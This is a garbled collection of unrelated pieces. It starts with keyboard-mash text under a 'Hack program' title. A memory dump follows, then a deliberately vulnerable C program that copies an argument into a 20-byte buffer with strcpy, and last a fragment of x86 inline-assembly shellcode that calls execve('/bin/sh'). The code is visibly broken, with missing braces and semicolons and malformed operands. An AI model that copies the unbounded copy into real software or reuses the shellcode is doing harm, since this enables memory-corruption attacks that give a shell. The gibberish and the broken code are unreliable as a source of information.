***** Hack program sending encrypted commands DFAdgagasfdgAERGAggasdgagdaASGDSAGFFFwwFFVDSDVsVVVsVSF356666666666543437HRrrrrhhhhrhROOTrootROOTadbadfb
badbBBBROOTvasvdvavsvsvaFOUND......graggearVVVVVREQVVQVREQFREVVREQ4444444562456DFAdgagasfdgAERGAggasdgagdaASGDSAGFFFwwFFVDSDVsVVVsVSF356666666666543437HRrrrrhhhhrhROOTrootROOTadbadfb
badbBBBROOTvasvdvavsvsvaFOUND......graggearVVVVVREQVVQVREQFREVVREQ4444444562456DFAdgagasfdgAERGAggasdgagdaASGDSAGFFFwwFFVDSDVsVVVsVSF356666666666543437HRrrrrhhhhrhROOTrootROOTadbadfb
badbBBBROOTvasvdvavsvsvaFOUND......graggearVVVVVREQVVQVREQFREVVREQ4444444562456DFAdgagasfdgAERGAggasdgagdaASGDSAGFFFwwFFVDSDVsVVVsVSF356666666666543437HRrrrrhhhhrhROOTrootROOTadbadfb
badbBBBROOTvasvdvavsvsvaFOUND......graggearVVVVVREQVVQVREQFREVVREQ4444444562456DFAdgagasfdgAERGAggasdgagdaASGDSAGFFFwwFFVDSDVsVVVsVSF356666666666543437HRrrrrhhhhrhROOTrootROOTadbadfb
badbBBBROOTvasvdvavsvsvaFOUND......graggearVVVVVREQVVQVREQFREVVREQ4444444562456RGREGgwhttwrhHWTRcommand
COMMANDQEGREQRGQGQERGttyyyyyyyygggggggggggggggggrrrrRAGRQggggggggggggggggggggggggggggggggggggggeeerrqqrtqert
0x8049700: s (0x616c62)
0x8049701: e (0x616c)
0x8049702: n (0x61) <---- each of these lines represents a memory address
0x8049703: d (0x0)
0x8049704: (0x0)
0x8049705: (0x0)
0x8049706: (0x0)
0x8049707: (0x0)
0x8049708: (0x0)
0x8049709: (0x19000000)
0x804970a: (0x190000)
0x804970b: (0x1900)
0x804970c: (0x19)
/*
 * Deliberately vulnerable demonstration program: it copies its first
 * command-line argument into a fixed 20-byte local buffer with no length
 * check, then prints the copy.
 * NOTE(review): the closing braces of both functions and the ';' after the
 * call in main are missing from the listing as shown, and no #include lines
 * or return types are visible.
 */
exploit(char *this) {
char string[20];  /* fixed-size local array: 19 characters plus the terminating NUL */
/*
 * strcpy() copies up to the source's NUL terminator and takes no account of
 * sizeof string, so an argument of 20 or more characters is written past the
 * end of the array. A bounded copy such as
 * snprintf(string, sizeof string, "%s", this) truncates instead of
 * overflowing.
 */
strcpy(string,this);
printf("%s\n", string);
/*
 * argv[1] is passed on without checking argc, so running the program with no
 * argument hands a null pointer to strcpy().
 */
main(int argc, char *argv[]) {
exploit(argv[1])
"popl %esi \n" //get seved EIP to esi,now we have /bin/sh address
"movl %esi,0x8(%esi) \n" //address of sh behind /bin/sh
"movl $0x0,0xc(%esi) \n" //NULL as 3rd argument goes after sh address
"movb $0x0,0x7(%esi) \n" //terminate /bin/sh with '\0'
"movl %esi,%ebx \n" //address of sh[0] in %ebx
"leal %0x8(%esi),%ecx \n" //address of sh in %ecx(2nd argument)
"leal %0xc(%esi),%edx \n" //address of NULL in %edx(3rd argument)
"movl $0xb,%eax \n" //sys call of execve in %eax
" int $0x80 \n" //kernel mode
" call -0x23 \n" //call popl %esi
" .string \"/bin/sh\" \n"); //our string